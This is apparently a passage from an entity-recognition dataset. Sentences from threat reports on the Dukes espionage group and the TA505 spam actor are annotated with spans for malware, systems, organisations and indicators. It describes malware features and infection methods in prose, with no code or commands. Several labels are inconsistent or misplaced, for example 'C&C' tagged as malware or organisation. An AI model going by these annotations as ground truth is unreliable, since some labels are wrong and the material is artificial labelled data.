"Malware"}, {"start": 82, "end": 96, "label": "Vulnerability"}]} {"text": "MINIDUKE : First known activity Loader July 2010 , Backdoor May 2011 Most recent known activity Loader : Spring 2015 , Backdoor : Summer 2014 C&C communication methods HTTP(S) , Twitter , Known toolset components Downloader , Backdoor , Loader .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 142, "end": 145, "label": "System"}, {"start": 168, "end": 175, "label": "Indicator"}, {"start": 178, "end": 185, "label": "System"}, {"start": 213, "end": 223, "label": "System"}, {"start": 226, "end": 234, "label": "System"}, {"start": 237, "end": 243, "label": "System"}]} {"text": "The MiniDuke toolset consists of multiple downloader and backdoor components , which are commonly referred to as the MiniDuke \u201c stage 1 \u201d , \u201c stage 2 \u201d , and \u201c stage 3 \u201d components as per Kaspersky \u2019s original MiniDuke whitepaper .", "spans": [{"start": 4, "end": 12, "label": "Malware"}, {"start": 117, "end": 125, "label": "Malware"}, {"start": 210, "end": 218, "label": "Malware"}]} {"text": "Additionally , a specific loader is often associated with the MiniDuke toolset and is referred to as the \u201c MiniDuke loader \u201d .", "spans": [{"start": 26, "end": 32, "label": "System"}, {"start": 62, "end": 70, "label": "Malware"}, {"start": 107, "end": 115, "label": "Malware"}, {"start": 116, "end": 122, "label": "System"}]} {"text": "While the loader has often been used together with other MiniDuke components , it has also commonly been used in conjunction with CosmicDuke and PinchDuke .", "spans": [{"start": 10, "end": 16, "label": "System"}, {"start": 57, "end": 65, "label": "Malware"}, {"start": 130, "end": 140, "label": "Malware"}, {"start": 145, "end": 154, "label": "Malware"}]} {"text": "In fact , the oldest samples of the loader that we have found were used with PinchDuke .", "spans": [{"start": 36, "end": 42, "label": "System"}, {"start": 77, "end": 86, "label": 
"Malware"}]} {"text": "To avoid confusion however , we have decided to continue referring to the loader as the \u201c MiniDuke loader \u201d .", "spans": [{"start": 74, "end": 80, "label": "System"}, {"start": 90, "end": 98, "label": "Malware"}, {"start": 99, "end": 105, "label": "System"}]} {"text": "Two details about MiniDuke components are worth noting .", "spans": [{"start": 18, "end": 26, "label": "Malware"}]} {"text": "Firstly , some of the MiniDuke components were written in Assembly language .", "spans": [{"start": 22, "end": 30, "label": "Malware"}, {"start": 58, "end": 66, "label": "System"}]} {"text": "While many malware were written in Assembly during the \u2018 old days \u2018 of curiosity-driven virus writing , it has since become a rarity .", "spans": [{"start": 35, "end": 43, "label": "System"}]} {"text": "Secondly , some of the MiniDuke components do not contain a hardcoded C&C server address , but instead obtain the address of a current C&C server via Twitter .", "spans": [{"start": 23, "end": 31, "label": "Malware"}, {"start": 70, "end": 73, "label": "System"}, {"start": 135, "end": 138, "label": "System"}, {"start": 150, "end": 157, "label": "System"}]} {"text": "The use of Twitter either to initially obtain the address of a C&C server ( or as a backup if no hardcoded primary C&C server responds ) is a feature also found in OnionDuke , CozyDuke , and HammerDuke .", "spans": [{"start": 11, "end": 18, "label": "System"}, {"start": 63, "end": 66, "label": "System"}, {"start": 115, "end": 118, "label": "System"}, {"start": 164, "end": 173, "label": "Malware"}, {"start": 176, "end": 184, "label": "Malware"}, {"start": 191, "end": 201, "label": "Malware"}]} {"text": "COZYDUKE : First known activity January 2010 , Most recent known activity : Spring 2015 , Other names CozyBear , CozyCar , Cozer , EuroAPT , C&C communication methods HTTP(S) , Twitter ( backup ) , Known toolset components Dropper , Modular backdoor , Multiple persistence components , 
Information gathering module , Screenshot module , Password stealing module , Password hash stealing module .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 102, "end": 110, "label": "Malware"}, {"start": 113, "end": 120, "label": "Malware"}, {"start": 123, "end": 128, "label": "Malware"}, {"start": 131, "end": 138, "label": "Malware"}, {"start": 141, "end": 144, "label": "System"}, {"start": 167, "end": 174, "label": "Indicator"}, {"start": 177, "end": 184, "label": "System"}, {"start": 223, "end": 230, "label": "System"}, {"start": 233, "end": 240, "label": "System"}]} {"text": "CozyDuke is not simply a malware toolset ; rather , it is a modular malware platform formed around a core backdoor component .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 106, "end": 114, "label": "System"}]} {"text": "This component can be instructed by the C&C server to download and execute arbitrary modules , and it is these modules that provide CozyDuke with its vast array of functionality .", "spans": [{"start": 40, "end": 43, "label": "System"}, {"start": 132, "end": 140, "label": "Malware"}]} {"text": "Known CozyDuke modules include : Command execution module for executing arbitrary Windows Command Prompt commands , Password stealer module , NT LAN Manager ( NTLM ) hash stealer module , System information gathering module , Screenshot module .", "spans": [{"start": 6, "end": 14, "label": "Malware"}, {"start": 82, "end": 89, "label": "System"}, {"start": 90, "end": 104, "label": "System"}, {"start": 116, "end": 132, "label": "System"}, {"start": 142, "end": 156, "label": "System"}, {"start": 159, "end": 163, "label": "System"}, {"start": 166, "end": 178, "label": "System"}]} {"text": "In addition to modules , CozyDuke can also be instructed to download and execute other , independent executables .", "spans": [{"start": 25, "end": 33, "label": "Malware"}]} {"text": "In some observed cases , these executables were self-extracting archive files 
containing common hacking tools , such as PSExec and Mimikatz , combined with script files that execute these tools .", "spans": [{"start": 120, "end": 126, "label": "System"}, {"start": 131, "end": 139, "label": "System"}]} {"text": "In other cases , CozyDuke has been observed downloading and executing tools from other toolsets used by the Dukes such as OnionDuke , SeaDuke , and HammerDuke .", "spans": [{"start": 17, "end": 25, "label": "Malware"}, {"start": 108, "end": 113, "label": "Organization"}, {"start": 122, "end": 131, "label": "Malware"}, {"start": 134, "end": 141, "label": "Malware"}, {"start": 148, "end": 158, "label": "Malware"}]} {"text": "ONIONDUKE : First known activity February 2013 , Most recent known activity Spring 2015 , C&C communication methods HTTP(S) , Twitter ( backup ) , Known toolset components Dropper , Loader , Multiple modular core components , Information stealer , Distributed Denial of Service ( DDoS ) module , Password stealing module , Information gathering module , Social network spamming module .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 90, "end": 93, "label": "System"}, {"start": 116, "end": 123, "label": "Indicator"}, {"start": 126, "end": 133, "label": "System"}, {"start": 172, "end": 179, "label": "System"}, {"start": 182, "end": 188, "label": "System"}, {"start": 191, "end": 207, "label": "System"}, {"start": 226, "end": 245, "label": "System"}, {"start": 248, "end": 277, "label": "System"}, {"start": 280, "end": 284, "label": "System"}]} {"text": "The OnionDuke toolset includes at least a dropper , a loader , an information stealer Trojan and multiple modular variants with associated modules .", "spans": [{"start": 4, "end": 13, "label": "Malware"}, {"start": 42, "end": 49, "label": "System"}, {"start": 54, "end": 60, "label": "System"}, {"start": 66, "end": 85, "label": "System"}, {"start": 86, "end": 92, "label": "Malware"}, {"start": 97, "end": 113, "label": "System"}]} {"text": "OnionDuke first 
caught our attention because it was being spread via a malicious Tor exit node .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 81, "end": 84, "label": "System"}]} {"text": "The Tor node would intercept any unencrypted executable files being downloaded and modify those executables by adding a malicious wrapper contained an embedded OnionDuke .", "spans": [{"start": 4, "end": 7, "label": "System"}, {"start": 160, "end": 169, "label": "Malware"}]} {"text": "Once the victim finished downloading the file and executed it , the wrapper would infect the victim \u2019s computer with OnionDuke before executing the original legitimate executable .", "spans": [{"start": 117, "end": 126, "label": "Malware"}]} {"text": "The same wrapper has also been used to wrap legitimate executable files , which were then made available for users to download from torrent sites .", "spans": []} {"text": "Again , if a victim downloaded a torrent containing a wrapped executable , they would get infected with OnionDuke .", "spans": [{"start": 104, "end": 113, "label": "Malware"}]} {"text": "Finally , we have also observed victims being infected with OnionDuke after they were already infected with CozyDuke .", "spans": [{"start": 60, "end": 69, "label": "Malware"}, {"start": 108, "end": 116, "label": "Malware"}]} {"text": "In these cases , CozyDuke was instructed by its C&C server to download and execute OnionDuke toolset .", "spans": [{"start": 17, "end": 25, "label": "Malware"}, {"start": 48, "end": 51, "label": "System"}, {"start": 83, "end": 92, "label": "Malware"}]} {"text": "SEADUKE : First known activity October 2014 , Most recent known activity Spring 2015 , Other names SeaDaddy , SeaDask , C&C communication methods HTTP(S) , Known toolset components Backdoor .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 99, "end": 107, "label": "Malware"}, {"start": 110, "end": 117, "label": "Malware"}, {"start": 120, "end": 123, "label": "Malware"}, {"start": 
146, "end": 153, "label": "Indicator"}]} {"text": "SeaDuke is a simple backdoor that focuses on executing commands retrieved from its C&C server , such as uploading and downloading files , executing system commands and evaluating additional Python code .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 83, "end": 86, "label": "System"}, {"start": 190, "end": 196, "label": "System"}]} {"text": "SeaDuke is made interesting by the fact that it is written in Python and designed to be cross-platform so that it works on both Windows and Linux .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 62, "end": 68, "label": "System"}, {"start": 128, "end": 135, "label": "System"}, {"start": 140, "end": 145, "label": "System"}]} {"text": "The only known infection vector for SeaDuke is via an existing CozyDuke infection , wherein CozyDuke downloads and executes the SeaDuke toolset .", "spans": [{"start": 36, "end": 43, "label": "Malware"}, {"start": 63, "end": 71, "label": "Malware"}, {"start": 92, "end": 100, "label": "Malware"}, {"start": 128, "end": 135, "label": "Malware"}]} {"text": "Like HammerDuke , SeaDuke appears to be used by the Dukes group primarily as a secondary backdoor left on CozyDuke victims after that toolset has completed the initial infection and stolen any readily available information from them .", "spans": [{"start": 5, "end": 15, "label": "Malware"}, {"start": 18, "end": 25, "label": "Malware"}, {"start": 52, "end": 57, "label": "Organization"}, {"start": 106, "end": 114, "label": "Malware"}]} {"text": "HAMMERDUKE : First known activity January 2015 , Most recent known activity Summer 2015 , Other names HAMMERTOSS , Netduke , C&C communication methods HTTP(S) , Twitter , Known toolset components Backdoor .", "spans": [{"start": 0, "end": 10, "label": "Malware"}, {"start": 102, "end": 112, "label": "Malware"}, {"start": 115, "end": 122, "label": "Malware"}, {"start": 125, "end": 128, "label": "System"}, {"start": 151, 
"end": 158, "label": "Indicator"}, {"start": 161, "end": 168, "label": "System"}]} {"text": "HammerDuke is a simple backdoor that is apparently designed for similar use cases as SeaDuke .", "spans": [{"start": 0, "end": 10, "label": "Malware"}, {"start": 85, "end": 92, "label": "Malware"}]} {"text": "Specifically , the only known infection vector for HammerDuke is to be downloaded and executed by CozyDuke onto a victim that has already been compromised by that toolset .", "spans": [{"start": 51, "end": 61, "label": "Malware"}, {"start": 98, "end": 106, "label": "Malware"}]} {"text": "This , together with HammerDuke \u2019s simplistic backdoor functionality , suggests that it is primarily used by the Dukes group as a secondary backdoor left on CozyDuke victims after CozyDuke performed the initial infection and stole any readily available information from them .", "spans": [{"start": 21, "end": 31, "label": "Malware"}, {"start": 113, "end": 118, "label": "Organization"}, {"start": 157, "end": 165, "label": "Malware"}, {"start": 180, "end": 188, "label": "Malware"}]} {"text": "HammerDuke is however interesting because it is written in .NET , and even more so because of its occasional use of Twitter as a C&C communication channel .", "spans": [{"start": 0, "end": 10, "label": "Malware"}, {"start": 59, "end": 63, "label": "System"}, {"start": 116, "end": 123, "label": "System"}, {"start": 129, "end": 132, "label": "Organization"}]} {"text": "Some HammerDuke variants only contain a hardcoded C&C server address from which they will retrieve commands , but other HammerDuke variants will first use a custom algorithm to generate a Twitter account name based on the current date .", "spans": [{"start": 5, "end": 15, "label": "Malware"}, {"start": 50, "end": 53, "label": "System"}, {"start": 120, "end": 130, "label": "Malware"}, {"start": 188, "end": 195, "label": "System"}]} {"text": "If the account exists , HammerDuke will then search for tweets from that account with links 
to image files that contain embedded commands for the toolset to execute .", "spans": [{"start": 24, "end": 34, "label": "Malware"}]} {"text": "HammerDuke \u2019s use of Twitter and crafted image files is reminiscent of other Duke toolsets .", "spans": [{"start": 0, "end": 10, "label": "Malware"}, {"start": 21, "end": 28, "label": "System"}, {"start": 77, "end": 81, "label": "Organization"}]} {"text": "Both OnionDuke and MiniDuke also use date-based algorithms to generate Twitter account names and then searched for any tweets from those accounts that linked to image files .", "spans": [{"start": 5, "end": 14, "label": "Malware"}, {"start": 19, "end": 27, "label": "Malware"}, {"start": 71, "end": 78, "label": "System"}]} {"text": "In contrast however , for OnionDuke and MiniDuke the linked image files contain embedded malware to be downloaded and executed , rather than instructions .", "spans": [{"start": 26, "end": 35, "label": "Malware"}, {"start": 40, "end": 48, "label": "Malware"}]} {"text": "Similarly , GeminiDuke may also download image files , but these would contain embedded additional configuration information for the toolset itself .", "spans": [{"start": 12, "end": 22, "label": "Malware"}]} {"text": "Unlike HammerDuke however , the URLs for the images downloaded by GeminiDuke are hardcoded in its initial configuration , rather than retrieved from Twitter .", "spans": [{"start": 7, "end": 17, "label": "Malware"}, {"start": 66, "end": 76, "label": "Malware"}, {"start": 149, "end": 156, "label": "System"}]} {"text": "CLOUDDUKE : First known activity June 2015 , Most recent known activity Summer 2015 , Other names MiniDionis , CloudLook , C&C communication methods HTTP(S) , Microsoft OneDrive , Known toolset components Downloader , Loader , Two backdoor variants .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 98, "end": 108, "label": "Malware"}, {"start": 111, "end": 120, "label": "Malware"}, {"start": 123, "end": 126, "label": "System"}, 
{"start": 149, "end": 156, "label": "Indicator"}, {"start": 159, "end": 168, "label": "Organization"}, {"start": 169, "end": 177, "label": "System"}, {"start": 205, "end": 215, "label": "System"}, {"start": 218, "end": 224, "label": "System"}]} {"text": "CloudDuke is a malware toolset known to consist of , at least , a downloader , a loader and two backdoor variants .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 66, "end": 76, "label": "System"}, {"start": 81, "end": 87, "label": "System"}]} {"text": "The CloudDuke downloader will download and execute additional malware from a preconfigured location .", "spans": [{"start": 4, "end": 13, "label": "Malware"}, {"start": 14, "end": 24, "label": "System"}]} {"text": "Interestingly , that location may be either a web address or a Microsoft OneDrive account .", "spans": [{"start": 63, "end": 72, "label": "Organization"}, {"start": 73, "end": 81, "label": "System"}]} {"text": "Both CloudDuke backdoor variants support simple backdoor functionality , similar to SeaDuke .", "spans": [{"start": 5, "end": 23, "label": "Malware"}, {"start": 84, "end": 91, "label": "Malware"}]} {"text": "While one variant will use a preconfigured C&C server over HTTP or HTTPS , the other variant will use a Microsoft OneDrive account to exchange commands and stolen data with its operators .", "spans": [{"start": 43, "end": 46, "label": "System"}, {"start": 59, "end": 63, "label": "Indicator"}, {"start": 67, "end": 72, "label": "Indicator"}, {"start": 104, "end": 113, "label": "Organization"}, {"start": 114, "end": 122, "label": "System"}]} {"text": "THE DUKES 7 YEARS OF RUSSIAN CYBER ESPIONAGE .", "spans": [{"start": 4, "end": 9, "label": "Organization"}]} {"text": "The Dukes primarily use spear-phishing emails when attempting to infect victims with their malware .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 39, "end": 45, "label": "System"}]} {"text": "These spear-phishing emails range from ones 
purposely designed to look like spam messages used to spread common crimeware and addressed to large numbers of people , to highly targeted emails addressed to only a few recipients ( or even just one person ) and with content that is highly relevant for the intended recipient .", "spans": [{"start": 21, "end": 27, "label": "System"}, {"start": 184, "end": 190, "label": "System"}]} {"text": "In some cases , the Dukes appear to have used previously compromised victims to send new spear-phishing emails to other targets .", "spans": [{"start": 20, "end": 25, "label": "Organization"}, {"start": 104, "end": 110, "label": "System"}]} {"text": "The spear-phishing emails used by the Dukes may contain either specially-crafted malicious attachments or links to URLs hosting the malware .", "spans": [{"start": 19, "end": 25, "label": "System"}, {"start": 38, "end": 43, "label": "Organization"}]} {"text": "When malicious attachments are used , they may either be designed to exploit a vulnerability in a popular software assumed to be installed on the victim \u2019s machine , such as Microsoft Word or Adobe Reader , or the attachment itself may have its icon and filename obfuscated in such a way that the file does not appear to be an executable .", "spans": [{"start": 174, "end": 183, "label": "Organization"}, {"start": 184, "end": 188, "label": "System"}, {"start": 192, "end": 204, "label": "System"}]} {"text": "The only instances which we are aware of where the Dukes did not use spear-phishing as the initial infection vector is with certain OnionDuke variants .", "spans": [{"start": 51, "end": 56, "label": "Organization"}, {"start": 132, "end": 141, "label": "Malware"}]} {"text": "These were instead spread using either a malicious Tor node that would trojanize legitimate applications on-the-fly with the OnionDuke toolset , or via torrent files containing previously trojanized versions of legitimate applications .", "spans": [{"start": 51, "end": 54, "label": "System"}, 
{"start": 125, "end": 134, "label": "Malware"}]} {"text": "Finally , it is worth noting that the Dukes are known to sometimes re-infect a victim of one of their malware tools with another one of their tools .", "spans": [{"start": 38, "end": 43, "label": "Organization"}]} {"text": "Examples include CozyDuke infecting its victims with SeaDuke , HammerDuke , or OnionDuke ; and CosmicDuke infecting its victims with PinchDuke , GeminiDuke or MiniDuke .", "spans": [{"start": 17, "end": 25, "label": "Malware"}, {"start": 53, "end": 60, "label": "Malware"}, {"start": 63, "end": 73, "label": "Malware"}, {"start": 79, "end": 88, "label": "Malware"}, {"start": 95, "end": 105, "label": "Malware"}, {"start": 133, "end": 142, "label": "Malware"}, {"start": 145, "end": 155, "label": "Malware"}, {"start": 159, "end": 167, "label": "Malware"}]} {"text": "The Dukes have employed exploits both in their infection vectors as well as in their malware .", "spans": [{"start": 4, "end": 9, "label": "Organization"}]} {"text": "We are however only aware of one instance - the exploitation of CVE-2013-0640 to deploy MiniDuke - where we believe the exploited vulnerability was a zero-day at the time that the group acquired the exploit .", "spans": [{"start": 64, "end": 77, "label": "Vulnerability"}, {"start": 88, "end": 96, "label": "Malware"}, {"start": 150, "end": 158, "label": "Vulnerability"}]} {"text": "In all known cases where exploits were employed , we believe the Dukes did not themselves discover the vulnerabilities or design the original exploits ; for the exploited zero-day , we believe the Dukes purchased the exploit .", "spans": [{"start": 65, "end": 70, "label": "Organization"}, {"start": 171, "end": 179, "label": "Vulnerability"}, {"start": 197, "end": 202, "label": "Organization"}]} {"text": "In all other cases , we believe the group simply repurposed publicly available exploits or proofs of concept .", "spans": []} {"text": "Attribution is always a difficult question , but 
attempting to answer it is important in understanding these types of threats and how to defend against them .", "spans": []} {"text": "This paper has already stated that we believe the Dukes to be a Russian state-sponsored cyberespionage operation .", "spans": [{"start": 50, "end": 55, "label": "Organization"}]} {"text": "To reach this conclusion , we began by analyzing the apparent objectives and motivations of the group .", "spans": []} {"text": "Based on what we currently know about the targets chosen by the Dukes over the past 7 years , they appear to have consistently targeted entities that deal with foreign policy and security policy matters .", "spans": [{"start": 64, "end": 69, "label": "Organization"}]} {"text": "These targets have included organizations such as ministries of foreign affairs , embassies , senates , parliaments , ministries of defense , defense contractors , and think tanks .", "spans": []} {"text": "In one of their more intriguing cases , the Dukes have appeared to also target entities involved in the trafficking of illegal drugs .", "spans": [{"start": 44, "end": 49, "label": "Organization"}]} {"text": "Even such targets however appear to be consistent with the overarching theme , given the drug trade \u2019s relevance to security policy .", "spans": []} {"text": "Based on this , we are confident in our conclusion that the Dukes \u2019 primary mission is the collection of intelligence to support foreign and security policy decision-making .", "spans": [{"start": 60, "end": 65, "label": "Organization"}]} {"text": "Based on the length of the Dukes \u2019 activity , our estimate of the amount of resources invested in the operation and the fact that their activity only appears to be increasing , we believe the group to have significant and most critically , stable financial backing .", "spans": [{"start": 27, "end": 32, "label": "Organization"}]} {"text": "The Dukes have consistently operated large-scale campaigns against high-profile targets 
while concurrently engaging in smaller , more targeted campaigns with apparent coordination and no evidence of unintentional overlap or operational clashes .", "spans": [{"start": 4, "end": 9, "label": "Organization"}]} {"text": "We therefore believe the Dukes to be a single , large , well-coordinated organization with clear separation of responsibilities and targets .", "spans": [{"start": 25, "end": 30, "label": "Organization"}]} {"text": "The Dukes appear to prioritize the continuation of their operations over stealth .", "spans": [{"start": 4, "end": 9, "label": "Organization"}]} {"text": "Their 2015 CozyDuke and CloudDuke campaigns take this to the extreme by apparently opting for speed and quantity over stealth and quality .", "spans": [{"start": 11, "end": 19, "label": "Malware"}, {"start": 24, "end": 33, "label": "Malware"}]} {"text": "In the most extreme case , the Dukes continued with their July 2015 CloudDuke campaign even after their activity had been outed by multiple security vendors .", "spans": [{"start": 31, "end": 36, "label": "Organization"}, {"start": 68, "end": 77, "label": "Malware"}]} {"text": "We therefore believe the Dukes \u2019 primary mission to be so valuable to their benefactors that its continuation outweighs everything else .", "spans": [{"start": 25, "end": 30, "label": "Organization"}]} {"text": "This apparent disregard for publicity suggests , in our opinion , that the benefactors of the Dukes are so powerful and so tightly connected to the group that the Dukes are able to operate with no apparent fear of repercussions on getting caught .", "spans": [{"start": 94, "end": 99, "label": "Organization"}, {"start": 163, "end": 168, "label": "Organization"}]} {"text": "We believe the only benefactor with the power to offer such comprehensive protection would be the government of the nation from which the group operates .", "spans": []} {"text": "We therefore believe the Dukes to work either within or directly for a government , thus 
ruling out the possibility of a criminal gang or another third party .", "spans": [{"start": 25, "end": 30, "label": "Organization"}]} {"text": "Kaspersky Labs has previously noted the presence of Russian-language artefacts in some of the Duke malware samples .", "spans": [{"start": 0, "end": 14, "label": "Organization"}, {"start": 94, "end": 98, "label": "Organization"}]} {"text": "We have also found a Russian-language error message in many PinchDuke samples which translates as , \u201c There is an error in the module \u2019s name ! The length of the data section name must be 4 bytes! \u201d Additionally , Kaspersky noted that based on the compilation timestamps , the authors of the Duke malware appear to primarily work from Monday to Friday between the times of 6am and 4pm UTC+0 .", "spans": [{"start": 60, "end": 69, "label": "Malware"}, {"start": 214, "end": 223, "label": "Organization"}, {"start": 292, "end": 296, "label": "Organization"}]} {"text": "This corresponds to working hours between 9am and 7pm in the UTC+3 time zone , also known as Moscow Standard Time , which covers , among others , much of western Russia , including Moscow and St. 
Petersburg .", "spans": [{"start": 100, "end": 113, "label": "System"}]} {"text": "The Kaspersky Labs analysis of the Duke malware authors \u2019 working times is supported by our own analysis , as well as that performed by FireEye .", "spans": [{"start": 4, "end": 18, "label": "Organization"}, {"start": 35, "end": 39, "label": "Organization"}, {"start": 136, "end": 143, "label": "Organization"}]} {"text": "This assertion of time zone is also supported by timestamps found in many GeminiDuke samples , which similarly suggest the group works in the Moscow Standard Time timezone , as further detailed in the section on the technical analysis of GeminiDuke .", "spans": [{"start": 74, "end": 84, "label": "Malware"}, {"start": 149, "end": 162, "label": "System"}, {"start": 238, "end": 248, "label": "Malware"}]} {"text": "Finally , the known targets of the Dukes - Eastern European foreign ministries , western think tanks and governmental organizations , even Russian-speaking drug dealers - conform to publicly known Russian foreign policy and security policy interests .", "spans": [{"start": 35, "end": 40, "label": "Organization"}]} {"text": "Even though the Dukes appear to have targeted governments all over the world , we are unaware of them ever targeting the Russian government .", "spans": [{"start": 16, "end": 21, "label": "Organization"}]} {"text": "While absence of evidence is not evidence of absence , it is an interesting detail to note .", "spans": []} {"text": "Threat Actor Profile : TA505 , From Dridex to GlobeImposter .", "spans": [{"start": 23, "end": 28, "label": "Organization"}, {"start": 36, "end": 42, "label": "Malware"}, {"start": 46, "end": 59, "label": "Malware"}]} {"text": "Proofpoint researchers track a wide range of threat actors involved in both financially motivated cybercrime and state-sponsored actions .", "spans": [{"start": 0, "end": 10, "label": "Organization"}]} {"text": "One of the more prolific actors that we track - referred to as TA505 - is 
responsible for the largest malicious spam campaigns we have ever observed , distributing instances of the Dridex banking Trojan , Locky ransomware , Jaff ransomware , The Trick banking Trojan , and several others in very high volumes .", "spans": [{"start": 63, "end": 68, "label": "Organization"}, {"start": 181, "end": 187, "label": "Malware"}, {"start": 196, "end": 202, "label": "Malware"}, {"start": 205, "end": 210, "label": "Malware"}, {"start": 224, "end": 228, "label": "Malware"}, {"start": 246, "end": 251, "label": "Malware"}, {"start": 260, "end": 266, "label": "Malware"}]} {"text": "Because TA505 is such a significant part of the email threat landscape , this blog provides a retrospective on the shifting malware , payloads , and campaigns associated with this actor .", "spans": [{"start": 8, "end": 13, "label": "Organization"}, {"start": 48, "end": 53, "label": "System"}]} {"text": "We examine their use of malware such as Jaff , Bart , and Rockloader that appear to be exclusive to this group as well as more widely distributed malware like Dridex and Pony .", "spans": [{"start": 40, "end": 44, "label": "Malware"}, {"start": 47, "end": 51, "label": "Malware"}, {"start": 58, "end": 68, "label": "Malware"}, {"start": 159, "end": 165, "label": "Malware"}, {"start": 170, "end": 174, "label": "Malware"}]} {"text": "Where possible , we detail the affiliate models with which they are involved and outline the current state of TA505 campaigns .", "spans": [{"start": 110, "end": 115, "label": "Organization"}]} {"text": "The infographic in Figure 1 traces the earliest known dates on which TA505 began distributing particular malware strains , beginning with Dridex in 2014 and most recently when they elevated GlobeImposter and Philadelphia from small , regionally targeted ransomware variants to global threats .", "spans": [{"start": 69, "end": 74, "label": "Organization"}, {"start": 138, "end": 144, "label": "Malware"}, {"start": 190, "end": 203, "label": "Malware"}, 
{"start": 208, "end": 220, "label": "Malware"}]} {"text": "Of note is TA505 \u2019s use of the Necurs botnet to drive their massive spam campaigns .", "spans": [{"start": 11, "end": 16, "label": "Organization"}, {"start": 31, "end": 37, "label": "Malware"}]} {"text": "As we saw in both 2016 and 2017 , disruptions to Necurs went hand-in-hand with quiet periods from TA505 .", "spans": [{"start": 49, "end": 55, "label": "Malware"}, {"start": 98, "end": 103, "label": "Organization"}]} {"text": "When the botnet came back online , TA505 campaigns quickly returned , usually at even greater scale than before the disruption .", "spans": [{"start": 35, "end": 40, "label": "Organization"}]} {"text": "The following is a more detailed description of the malware and notable campaign attributes associated with TA505 .", "spans": [{"start": 108, "end": 113, "label": "Organization"}]} {"text": "The now infamous Dridex banking Trojan can trace much of its DNA to Cridex and Bugat .", "spans": [{"start": 17, "end": 23, "label": "Malware"}, {"start": 32, "end": 38, "label": "Malware"}, {"start": 68, "end": 74, "label": "Malware"}, {"start": 79, "end": 84, "label": "Malware"}]} {"text": "Dridex itself appeared shortly after the Zeus banking Trojan was taken down .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 41, "end": 45, "label": "Malware"}, {"start": 54, "end": 60, "label": "Malware"}]} {"text": "It was originally documented on July 25 , 2014 ( or June 22 , 2014 , according to Kaspersky ) and the first campaign we observed in which TA505 distributed Dridex occurred three days later on July 28 .", "spans": [{"start": 82, "end": 91, "label": "Organization"}, {"start": 138, "end": 143, "label": "Organization"}, {"start": 156, "end": 162, "label": "Malware"}]} {"text": "Although a number of actors have distributed Dridex , TA505 operates multiple affiliate IDs , including what appears to be the earliest recorded affiliate , botnet ID 125 .", "spans": [{"start": 45, 
"end": 51, "label": "Malware"}, {"start": 54, "end": 59, "label": "Organization"}]} {"text": "These early campaigns were distributed via the Lerspeng downloader while later campaigns occasionally used Pony or Andromeda as intermediate loaders to distribute various instances of Dridex .", "spans": [{"start": 47, "end": 55, "label": "Malware"}, {"start": 56, "end": 66, "label": "System"}, {"start": 107, "end": 111, "label": "Malware"}, {"start": 115, "end": 124, "label": "Malware"}, {"start": 184, "end": 190, "label": "Malware"}]} {"text": "Although TA505 initially distributed Dridex botnet ID 125 , they were observed using botnet ID 220 in March 2015 and botnet ID 223 in December of that year .", "spans": [{"start": 9, "end": 14, "label": "Organization"}, {"start": 37, "end": 43, "label": "Malware"}]} {"text": "Later , they were also associated with botnet IDs 7200 and 7500 .", "spans": []} {"text": "These botnets generally target the following regions :", "spans": []} {"text": "125: UK , US , and Canada 220: UK and Australia 223: Germany 7200: UK 7500: Australia .", "spans": []} {"text": "TA505 continued distributing Dridex through early June 2017 using a range of email attachments .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 29, "end": 35, "label": "Malware"}, {"start": 77, "end": 82, "label": "System"}]} {"text": "Most recently these included PDF attachments with embedded Microsoft Word documents bearing malicious macros that call PowerShell commands that install Dridex .", "spans": [{"start": 29, "end": 32, "label": "System"}, {"start": 59, "end": 68, "label": "Organization"}, {"start": 69, "end": 73, "label": "System"}, {"start": 102, "end": 108, "label": "System"}, {"start": 119, "end": 129, "label": "System"}, {"start": 152, "end": 158, "label": "Malware"}]} {"text": "However , because of the length of time for which the group has been distributing Dridex , distribution mechanisms trace the state of the art for the last two years 
of email campaigns with techniques ranging from straight macro documents to a variety of zipped scripts .", "spans": [{"start": 82, "end": 88, "label": "Malware"}, {"start": 168, "end": 173, "label": "System"}, {"start": 222, "end": 227, "label": "System"}, {"start": 254, "end": 260, "label": "System"}]} {"text": "In October 2015 , we observed several campaigns in which TA505 targeted Japanese and UK organizations with the Shifu banking Trojan .", "spans": [{"start": 57, "end": 62, "label": "Organization"}, {"start": 111, "end": 116, "label": "Malware"}, {"start": 125, "end": 131, "label": "Malware"}]} {"text": "Shifu is relatively common in Japan but was a new addition to TA505 \u2019s toolbox .", "spans": [{"start": 0, "end": 5, "label": "Malware"}, {"start": 62, "end": 67, "label": "Organization"}]} {"text": "It appears that they introduced Shifu after high-profile law enforcement actions impacted Dridex distribution .", "spans": [{"start": 32, "end": 37, "label": "Malware"}, {"start": 90, "end": 96, "label": "Malware"}]} {"text": "However , TA505 was also among the first actors to return to high-volume Dridex distribution this same month , even as they demonstrated their ability to diversify and deliver threats beyond Dridex .", "spans": [{"start": 10, "end": 15, "label": "Organization"}, {"start": 73, "end": 79, "label": "Malware"}, {"start": 191, "end": 197, "label": "Malware"}]} {"text": "As with many of their other campaigns , TA505 delivered Shifu through macro laden Microsoft Office document attachments .", "spans": [{"start": 40, "end": 45, "label": "Organization"}, {"start": 56, "end": 61, "label": "Malware"}, {"start": 70, "end": 75, "label": "System"}, {"start": 82, "end": 91, "label": "Organization"}, {"start": 92, "end": 98, "label": "System"}]} {"text": "TA505 introduced Locky ransomware in February 2016 .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 17, "end": 22, "label": "Malware"}]} {"text": "After alternating for over 
